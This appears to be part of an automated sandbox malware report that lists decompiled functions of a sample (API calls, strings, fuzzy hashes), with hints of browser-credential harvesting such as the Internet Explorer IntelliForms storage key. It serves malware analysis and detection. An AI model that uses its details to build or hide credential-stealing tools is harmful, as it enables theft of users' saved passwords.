                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                    • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                                                                    • API String ID: 4131475296-680441574
                                                                                                                                                    • Opcode ID: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
                                                                                                                                                    • Instruction ID: ced938f56f23152dc4036b8c9c372f29a7907612beabbfd18841790b2154e098
                                                                                                                                                    • Opcode Fuzzy Hash: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
                                                                                                                                                    • Instruction Fuzzy Hash: F84118B6D4011DABCB10EF99DD85AEFB7BCAF18304F1040AAB504F2191D7749B458BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409FF5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A076
                                                                                                                                                      • Part of subcall function 0040A4E7: memset.MSVCRT ref: 0040A4FA
                                                                                                                                                      • Part of subcall function 0040A4E7: _itow.MSVCRT ref: 0040A508
                                                                                                                                                    • wcslen.MSVCRT ref: 0040A094
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                                                                                                    • LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                                                                                                                    • memcpy.MSVCRT ref: 0040A10D
                                                                                                                                                      • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409F8D
                                                                                                                                                      • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FAB
                                                                                                                                                      • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FC9
                                                                                                                                                      • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                    • String ID: strings
                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                    • Opcode ID: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
                                                                                                                                                    • Instruction ID: f88dad89c8a087f2027bd78e20ebd55682c2f8a720c3c381d0e8595ecd4ac891
                                                                                                                                                    • Opcode Fuzzy Hash: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
                                                                                                                                                    • Instruction Fuzzy Hash: 84419A792003059BD7149F18EC91F323365F76430AB99053AE802A73B2DB79EC22CB1E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A759 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                                                                    • Opcode ID: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
                                                                                                                                                    • Instruction ID: 9d6a1000cc6d846fb7caa7b95204278ebeb8f13d5a9664e287c5e204bace7976
                                                                                                                                                    • Opcode Fuzzy Hash: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
                                                                                                                                                    • Instruction Fuzzy Hash: E21177325002197AEB24EB91DD4AE9F77BCEF04750F4040B6F508E1192E7745A51CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00419008 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                    • String ID: -journal$-wal
                                                                                                                                                    • API String ID: 438689982-2894717839
                                                                                                                                                    • Opcode ID: 1c44e7744deb4f42a943bfd88e26940ffc435d901b7e29abb7fabc02dd37aa77
                                                                                                                                                    • Instruction ID: 551b55634523189e5c53bd135c739114fe40c1c2f7e89174430398bb56853e76
                                                                                                                                                    • Opcode Fuzzy Hash: 1c44e7744deb4f42a943bfd88e26940ffc435d901b7e29abb7fabc02dd37aa77
                                                                                                                                                    • Instruction Fuzzy Hash: 54A1DEB1A00606BFDB14CFA4C8517DEBBB0BF04314F14856EE468D7381D778AA95CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00404D3C Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404DE0
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404DF3
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404E08
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404E20
                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00404E3C
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00404E51
                                                                                                                                                      • Part of subcall function 00404AFB: GetDlgItem.USER32 ref: 00404B08
                                                                                                                                                      • Part of subcall function 00404AFB: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404B1D
                                                                                                                                                    • SendDlgItemMessageW.USER32 ref: 00404E69
                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00404F7A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                    • Opcode ID: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
                                                                                                                                                    • Instruction ID: 9cc36a3a9081561078e880a2f522ad53539937229c5c78969c314d16862aa257
                                                                                                                                                    • Opcode Fuzzy Hash: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
                                                                                                                                                    • Instruction Fuzzy Hash: DE61D570100705ABDB31AF25C885A2A73B9FF90724F04C63EF615A66E1D778ED50CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00441DE1 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00441E61
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00441E76
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00441E8B
                                                                                                                                                      • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
                                                                                                                                                      • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
                                                                                                                                                      • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                                                                    • Opcode ID: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
                                                                                                                                                    • Instruction ID: 7a979a8a07820355720b76b8412d60638824142cd7e99aea4044fab4cdb489ca
                                                                                                                                                    • Opcode Fuzzy Hash: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
                                                                                                                                                    • Instruction Fuzzy Hash: A34146755487014AF7309A65898177773E8CB04329F308A2FF86BE26E2EB7CB4C6551E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00404F8A Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                    • Opcode ID: 0e9ce97f1899c70dad5c1b786cff8819ba8fc56cafb55192b5cf30274f9505bc
                                                                                                                                                    • Instruction ID: ba4bb41810d6ea78f7103a52efe52e464eccc4a9d5620aafabcd38e7c3fa5a1e
                                                                                                                                                    • Opcode Fuzzy Hash: 0e9ce97f1899c70dad5c1b786cff8819ba8fc56cafb55192b5cf30274f9505bc
                                                                                                                                                    • Instruction Fuzzy Hash: 2331D3B1501601BFDB24AF69D94692AF7B8FF04304B10813EF145EB291D778EC90CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D0C3 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32 ref: 0040D0E2
                                                                                                                                                    • GetWindowRect.USER32 ref: 0040D0F8
                                                                                                                                                    • GetWindowRect.USER32 ref: 0040D10B
                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 0040D128
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040D145
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040D165
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040D18C
                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040D195
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                    • Opcode ID: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
                                                                                                                                                    • Instruction ID: 1b30ad45943261d114c7945feb8e2d934b1f0a15928f611d2c59e033839f0f44
                                                                                                                                                    • Opcode Fuzzy Hash: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
                                                                                                                                                    • Instruction Fuzzy Hash: 5F21D875900209FFDB11DFA8CD89FEEBBB9FB48701F104164F655A2160C771AA519B24
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004072FB Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EmptyClipboard.USER32(?,?,0040D79F,-00000210), ref: 00407303
                                                                                                                                                    • wcslen.MSVCRT ref: 00407310
                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040D79F,-00000210), ref: 00407320
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 0040732D
                                                                                                                                                    • memcpy.MSVCRT ref: 00407336
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040733F
                                                                                                                                                    • SetClipboardData.USER32 ref: 00407348
                                                                                                                                                    • CloseClipboard.USER32(?,?,0040D79F,-00000210), ref: 00407358
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                    • Opcode ID: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
                                                                                                                                                    • Instruction ID: e9f640a6ba64593c4f3b5e3a0a2b414f675f529f5a9edaa6aa7e0ad5043136ba
                                                                                                                                                    • Opcode Fuzzy Hash: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
                                                                                                                                                    • Instruction Fuzzy Hash: 14F0B43B5002187BD2102FE5AC4DE1B772CEB86F97B050179FA09D2251DE749E0486B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00404BC7 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404BDE
                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404BF7
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404C04
                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404C10
                                                                                                                                                    • memset.MSVCRT ref: 00404C74
                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00404CA9
                                                                                                                                                    • SetFocus.USER32(?), ref: 00404D2F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                    • Opcode ID: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
                                                                                                                                                    • Instruction ID: e15596ac8dd535375262745d85448c61c7cc278dece76afc2af43b7580886122
                                                                                                                                                    • Opcode Fuzzy Hash: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
                                                                                                                                                    • Instruction Fuzzy Hash: 8B417C70901219BBDB20DF95CD85DAFBFB8FF08755F10406AF509A6291D3749E40CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BD8C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                    • wcscat.MSVCRT ref: 0040BE5B
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040BE82
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite_snwprintfwcscatwcslen
                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                    • API String ID: 2451617256-4153097237
                                                                                                                                                    • Opcode ID: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
                                                                                                                                                    • Instruction ID: be6843ca6d8e3427859c99e4dc5891dee3dff4c22b8a3cb8274265ecf8740657
                                                                                                                                                    • Opcode Fuzzy Hash: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
                                                                                                                                                    • Instruction Fuzzy Hash: BC31A031900208EFDF04AF55CC86EEE7B75FF44320F10416AE905AB1E2DB75AA51DB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A668 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                    • String ID: 0$6
                                                                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                                                                    • Opcode ID: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
                                                                                                                                                    • Instruction ID: 6379b183058c7bfcb2c9996af6a46f5bf8fbaffb9494aead0661b6c96fd4ce8b
                                                                                                                                                    • Opcode Fuzzy Hash: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
                                                                                                                                                    • Instruction Fuzzy Hash: FF219A72505340ABD721DF55C84599BB7F8FB84745F044A3FFA84A2280E7B6CA10CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407A1C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                    • Opcode ID: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
                                                                                                                                                    • Instruction ID: ec6d441468c88601e944e5005585d56a697b1d5e2a610cd326798869af21cd90
                                                                                                                                                    • Opcode Fuzzy Hash: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
                                                                                                                                                    • Instruction Fuzzy Hash: 0F012D72E4431575F720AB519C46BBF73A89F40B19F10407FFC14A50C2EABCEA444A99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00441B86 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wcscpy.MSVCRT ref: 00441B9B
                                                                                                                                                    • wcscat.MSVCRT ref: 00441BAA
                                                                                                                                                    • wcscat.MSVCRT ref: 00441BBB
                                                                                                                                                    • wcscat.MSVCRT ref: 00441BCA
                                                                                                                                                    • VerQueryValueW.VERSION(?,?,00000000,?), ref: 00441BE4
                                                                                                                                                      • Part of subcall function 00407447: wcslen.MSVCRT ref: 0040744E
                                                                                                                                                      • Part of subcall function 00407447: memcpy.MSVCRT ref: 00407464
                                                                                                                                                      • Part of subcall function 00407511: lstrcpyW.KERNEL32 ref: 00407526
                                                                                                                                                      • Part of subcall function 00407511: lstrlenW.KERNEL32(?), ref: 0040752D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                    • API String ID: 393120378-2245444037
                                                                                                                                                    • Opcode ID: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
                                                                                                                                                    • Instruction ID: a565dbaf5ef1236623e3a457584e7ee1bc303587053621a732091bcd91b9d386
                                                                                                                                                    • Opcode Fuzzy Hash: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
                                                                                                                                                    • Instruction Fuzzy Hash: 27017C7290020CB6EF51EAA1CD45EDF77BCAF04308F4005A7B514E2052EB78DB86AB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A497 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                    • Opcode ID: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
                                                                                                                                                    • Instruction ID: 8e174b2d8d79018ad6e296a97c01706163ed31911536b8ede193c50f01e1bc5f
                                                                                                                                                    • Opcode Fuzzy Hash: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
                                                                                                                                                    • Instruction Fuzzy Hash: CBE0B679A8830079F96025861E4BB2E61508774F59FB0886FF50AB05D1E9FE95A8710F
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412BDF Relevance: 10.5, APIs: 2, Strings: 5, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: !-A$Y,A$a,A$a,A$,A
                                                                                                                                                    • API String ID: 3510742995-194831239
                                                                                                                                                    • Opcode ID: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
                                                                                                                                                    • Instruction ID: c1edbe63f0487e6d5a9ef4690cfcbd933ff0b0d7cc0200e8d9d6566c39fc0ab4
                                                                                                                                                    • Opcode Fuzzy Hash: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
                                                                                                                                                    • Instruction Fuzzy Hash: C8E04F35980610EAF330DB459C07B863394A796756F50C43BF508A6193C6FC599C8B9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00428591 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                                                                    • Opcode ID: 46f26c3fdd6910b4d7312f8d71752383c86baf733d40e003e56e3ea4decbe60e
                                                                                                                                                    • Instruction ID: a56ed1d78848c17894bc611d03527086a745bd119e00672256ad5f5daa2e3940
                                                                                                                                                    • Opcode Fuzzy Hash: 46f26c3fdd6910b4d7312f8d71752383c86baf733d40e003e56e3ea4decbe60e
                                                                                                                                                    • Instruction Fuzzy Hash: 93818E706093619FDB10DF15E88161FB7E0BF98354F94885FE8849B252EB78EC44CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410EDB Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040F96C,00000000,00000000), ref: 00410F16
                                                                                                                                                    • memset.MSVCRT ref: 00410F78
                                                                                                                                                    • memset.MSVCRT ref: 00410F88
                                                                                                                                                      • Part of subcall function 00410DF5: wcscpy.MSVCRT ref: 00410E1E
                                                                                                                                                    • memset.MSVCRT ref: 00411073
                                                                                                                                                    • wcscpy.MSVCRT ref: 00411094
                                                                                                                                                    • CloseHandle.KERNEL32(?,0040F96C,?,?,?,0040F96C,00000000,00000000), ref: 004110EA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3300951397-0
                                                                                                                                                    • Opcode ID: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
                                                                                                                                                    • Instruction ID: ff77c4a4bb0d76b6113ba9f034b07e179d87586f5f3f4fadb46fa2bb0041fc85
                                                                                                                                                    • Opcode Fuzzy Hash: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
